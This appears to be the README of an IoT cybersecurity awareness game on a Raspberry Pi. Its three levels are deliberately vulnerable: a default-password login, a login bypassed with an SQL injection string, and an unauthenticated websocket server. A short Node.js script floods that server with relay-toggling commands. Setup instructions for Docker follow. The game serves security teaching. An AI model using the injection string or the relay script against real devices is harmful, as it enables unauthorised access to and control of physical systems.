IoT cybersecurity awareness game is created to illustrate most typical cybersecurity lapses in IoT systems. The game design expects some technical capablities, which range from reading manuals to acutally writing code. Game has three levels, which are ordered by difficulty.

In level 1, a simple login page is presented.

This level is used to demonstrate how system can be compromised by default passwords.

Those credentials are provided in the user manual.

Once entered they will provide full control over the system.

In level 2, you start a with an outdated webpage.

This level shows, why it is important to keep software updated.

By typing 1' OR '1'='1';/* on the username field, you can access the system without knowing the password, because it is open to sql injection.

After the login you will be again provided full control over the system.

Level 3 offers no UI, instead it offers unauthenticated websocket server. This level is designed to show, what can happen to IoT systems, which have been exposed to networks, where adversarial behaviour is expected.

Hacks like this:

const WebSocketClient = require('websocket').client

const client = new WebSocketClient()

client.on('connect', (connection) => {
  console.log('WebSocket Client Connected')

  function toggleRelay () {
    if (connection.connected) {
      connection.send(JSON.stringify({
        type: 'toggleRelay',
        data: JSON.stringify({
          pin: 12
        })
      }))
      connection.send(JSON.stringify({
        type: 'toggleRelay',
        data: JSON.stringify({
          pin: 11
        })
      }))
    }
  }

  setInterval(toggleRelay, 100)
})

client.connect('ws://192.168.1.1/websocket')

Can produce a result like this:

• Raspberry Pi 3 (tested) or better
• 2 Channel Relay module
• 4 Female-Female jumper cables

• Raspbian OS

Connect the Raspberry Pi and the relay module as shown below:

So by using physical pin numbering schema, connection should be mapped like this:

1. Raspberry pin 6 -> Relay module GND
2. Raspberry pin 4 -> Relay module VCC
3. Raspberry pin 11 -> Relay module IN1
4. Raspberry pin 12 -> Relay module IN2

• sudo apt-get install git

• curl -fsSL get.docker.com -o get-docker.sh && sh get-docker.sh

• Optionally follow instructions to avoid sudo commands with docker

• git clone https://github.com/ebakoba/iot-cybersecurity-game.git

• sudo docker build -t cybergame . NB! This can take a long time

• Run game

For level 1 - sudo docker run --privileged -e "LEVEL=1" -d -p 80:3000 cybergame

For level 2 - sudo docker run --privileged -e "LEVEL=2" -d -p 80:3000 cybergame

For level 3 - sudo docker run --privileged -e "LEVEL=3" -d -p 80:3000 cybergame

• First two levels can be accessed on http://[RASPBERRY_IP], the third one is located at ws://[RASPBERRY_IP]/websocket, where is [RASPBERRY_IP] is an IP address belonging to the raspberry device.

• Before starting a new level old one must be killed. This could be achieved with sudo docker kill $(sudo docker ps -q)

Follow these instructions to set up Wi-Fi access point using Raspberry Pi. This will enable more convinient networking for the game, as everybody can just connect to the game network.